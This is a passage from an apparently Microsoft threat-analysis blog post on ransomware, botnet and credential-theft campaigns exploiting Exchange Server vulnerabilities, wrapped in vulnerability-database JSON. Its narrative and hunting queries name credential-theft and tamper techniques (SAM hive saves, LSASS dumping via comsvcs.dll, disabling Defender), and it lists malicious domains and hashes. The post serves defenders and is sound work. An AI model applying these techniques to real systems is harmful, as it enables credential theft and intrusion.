recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. **As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dopped the xx.bat file (in this instance, a version of Chopper):\n\n\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n\n\n_Fig 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and WMI Event subscription for persistence. A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing their administrative access to run the _Set-MPPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n\n\n\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n\n\n_Figure 10. Email subjects of possibly malicious emails_\n\n\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n\n\n_Figure 12. Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n\n\n_Figure 14. __PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain, and attempts to spread the payload throughout the network, first attempting to spread the payload over WMI using Invoke-WMIMethod to attempt to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n\n\n_Figure 15. Pydomer __ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n\n\n_Figure 17.__ Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange commandlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining the access to the systems they exploited. By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users for changes, and ensure all users require a password for sign-in. New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like[ Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n \n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus **\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * [Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions **\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems that have been suspected as compromised**\n\nSearch for creations of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence **\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft **\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which allows for the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here, the threats may utilize files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web shells observed during attacks:\n\n * 201e4e9910dcdc8c4ffad84b60b328978db8848d265c0b9ba8473cf65dcd0c41\n * 2f0bc81c2ea269643cae307239124d1b6479847867b1adfe9ae712a1d5ef135e\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 8e90ed33c7ee82c0b64078ea36ec95f7420ba435c693b3b3dd728b494abf7dfc\n * a291305f181e24fe7194154b4cd355ccb039d5765709c80999e392efec69c90a\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * dd29e8d47dde124c7d14e614e03ccaab3ecaa50e0a0bef985ed59e98928bc13d\n\nDoejoCrypt associated hashes:\n\n * 027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27\n * 10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da\n * 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff\n * 904fbea2cd68383f32c5bc630d2227601dc52f94790fe7a6a7b6d44bfd904ff3\n * bf53b637683f9cbf92b0dd6c97742787adfbc12497811d458177fdeeae9ec748\n * e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6\n * fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65\n * feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede\n\nLemon Duck associated hashes:\n\n * 0993cc228a74381773a3bb0aa36a736f5c41075fa3201bdef4215a8704e582fc\n * 3df23c003d62c35bd6da90df12826c1d3fdd94029bf52449ba3d89920110d5ec\n * 4f0b9c0482595eee6d9ece0705867b2aae9e4ff68210f32b7425caca763723b9\n * 56101ab0881a6a34513a949afb5a204cad06fd1034f37d6791f3ab31486ba56c\n * 69ce57932c3be3374e8843602df1c93e1af622fc53f3f1d9b0a75b66230a1e2e\n * 737752588f32e4c1d8d20231d7ec553a1bd4a0a090b06b2a1835efa08f9707c4\n * 893ddf0de722f345b675fd1ade93ee1de6f1cad034004f9165a696a4a4758c3e\n * 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719\n * 9f2fe33b1c7230ec583d7f6ad3135abcc41b5330fa5b468b1c998380d20916cd\n * a70931ebb1ce4f4e7d331141ad9eba8f16f98da1b079021eeba875aff4aeaa85\n * d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09\n * db093418921aae00187ae5dc6ed141c83614e6a4ec33b7bd5262b7be0e9df2cd\n * dc612f5c0b115b5a13bdb9e86f89c5bfe232e5eb76a07c3c0a6d949f80af89fd\n * f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501\n * f8d388f502403f63a95c9879c806e6799efff609001701eed409a8d33e55da2f\n * fbeefca700f84373509fd729579ad7ea0dabdfe25848f44b2fbf61bf7f909df0\n\nPydomer associated hashes:\n\n * 7e07b6addf2f0d26eb17f4a1be1cba11ca8779b0677cedc30dbebef77ccba382\n * 866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\n * 910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\n * a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287\n * b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f\n * c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n * c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T21:21:07", "type": "mmpc", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MMPC:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:28:51", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft 